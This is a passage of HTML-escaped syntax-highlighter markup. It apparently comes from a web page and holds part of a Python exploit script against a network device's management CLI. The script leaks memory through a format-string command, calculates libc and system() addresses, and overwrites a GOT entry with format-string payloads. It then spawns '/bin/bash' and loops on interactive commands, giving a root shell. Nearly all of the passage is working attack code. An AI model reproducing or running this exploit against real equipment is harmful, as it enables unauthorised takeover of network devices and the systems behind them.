class=\"crayon-s\">&#8220;: &#8220;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">clearlog<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">outbin<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;x00&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-64\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-65\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">starting_point<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">clearlog<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;show sel %147$x&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">sendcommand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">time<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-70\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">readlog<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">outbin<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;AAAAAAA&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">clearlog<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">outbin<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-74\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-75\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-76\"><span class=\"crayon-v\">clidcos_step<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1DB0C<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-77\"><span class=\"crayon-v\">libc_emulator_snprintf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0004b210<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-78\"><span class=\"crayon-v\">libc_emulator_system<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0003af60<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-79\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-80\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Going through some menus please wait a moment..&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-81\"><span class=\"crayon-e\">sendcommand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;c&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-82\"><span class=\"crayon-v\">time<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-83\"><span class=\"crayon-e\">sendcommand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;show version&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-84\"><span class=\"crayon-v\">time<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-85\"><span class=\"crayon-e\">sendcommand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;connect local-mgmt&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-86\"><span class=\"crayon-v\">time<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-87\"><span class=\"crayon-e\">sendcommand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;connect local-mgmt&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-88\"><span class=\"crayon-v\">time<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-89\"><span class=\"crayon-e\">sendcommand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;show version&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-90\"><span class=\"crayon-v\">time<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-91\"><span class=\"crayon-e\">clearlog<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-92\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-93\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;You should now see on the other terminal message simmilar to &#8220;Error: Already in local-mgmt shell..&#8221; &#8220;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-94\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[.] Dumping clicli::LocalMgmtSel::show(void*, base::String const&amp;) addres from libsamvsh.so&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-95\"><span class=\"crayon-v\">off3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">starting_point<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-96\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;&nbsp;&nbsp;&nbsp;&nbsp;-&gt; &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">off3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-97\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[.] Calculating _ZN7clidcos15CommandEmulator16cli_param_filterEPKc .got.plt&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-98\"><span class=\"crayon-v\">clidcosGOTPLT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">off3<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-e\">clidcos_step<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-99\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;&nbsp;&nbsp;&nbsp;&nbsp;-&gt; &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">clidcosGOTPLT<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-100\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[.] Dumping snprintf address from libc&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-101\"><span class=\"crayon-v\">libc_printf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">dump<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">clidcosGOTPLT<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;s&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-102\"><span class=\"crayon-v\">libc_tmp1_hex<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">binascii<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">hexlify<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">libc_printf<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-103\"><span class=\"crayon-v\">libc_snprintf_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">libc_tmp1_hex<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-104\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;&nbsp;&nbsp;&nbsp;&nbsp;-&gt; &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">libc_snprintf_addr<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-105\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[.] Calculating libc system address&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-106\"><span class=\"crayon-v\">libc_base_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">libc_snprintf_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">libc_emulator_snprintf<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-107\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;&nbsp;&nbsp;&nbsp;&nbsp;-&gt; libc base addr = &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">libc_base_addr<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-108\"><span class=\"crayon-v\">libc_system_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">libc_base_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">libc_emulator_system<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-109\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;&nbsp;&nbsp;&nbsp;&nbsp;-&gt; system addr = &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">libc_system_addr<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-110\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;n[.] Sending payload..&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-111\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-112\"><span class=\"crayon-e\">sendcommand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">generate_payload<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">libc_system_addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">clidcosGOTPLT<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-113\"><span class=\"crayon-e\">print <\/span><span class=\"crayon-e\">generate_payload<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">libc_system_addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-114\"><span class=\"crayon-e\">sendcommand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;show version&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-115\"><span class=\"crayon-v\">time<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-116\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-117\"><span class=\"crayon-e\">sendcommand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">generate_payload<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">libc_system_addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">clidcosGOTPLT<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-118\"><span class=\"crayon-e\">print <\/span><span class=\"crayon-e\">generate_payload<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">libc_system_addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-119\"><span class=\"crayon-e\">sendcommand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;show version&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-120\"><span class=\"crayon-v\">time<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-121\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-122\"><span class=\"crayon-e\">sendcommand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">generate_payload<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">libc_system_addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">clidcosGOTPLT<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-123\"><span class=\"crayon-e\">print <\/span><span class=\"crayon-e\">generate_payload<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">libc_system_addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-124\"><span class=\"crayon-e\">sendcommand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;show version&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-125\"><span class=\"crayon-v\">time<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-126\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-127\"><span class=\"crayon-e\">sendcommand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">generate_payload<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">libc_system_addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">clidcosGOTPLT<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-128\"><span class=\"crayon-e\">print <\/span><span class=\"crayon-e\">generate_payload<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">libc_system_addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-129\"><span class=\"crayon-e\">sendcommand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;show version&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-130\"><span class=\"crayon-v\">time<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-131\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-132\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Sleep for fork adjustment..&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-133\"><span class=\"crayon-v\">time<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-134\"><span class=\"crayon-e\">sendcommand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;ssh \/bin\/bash&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-135\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Ok please type your commands (type exit for exit)&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-136\"><span class=\"crayon-v\">time<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-137\"><span class=\"crayon-st\">while<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-138\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">raw_input<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&gt; &#8220;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-139\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;exit&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-140\"><span 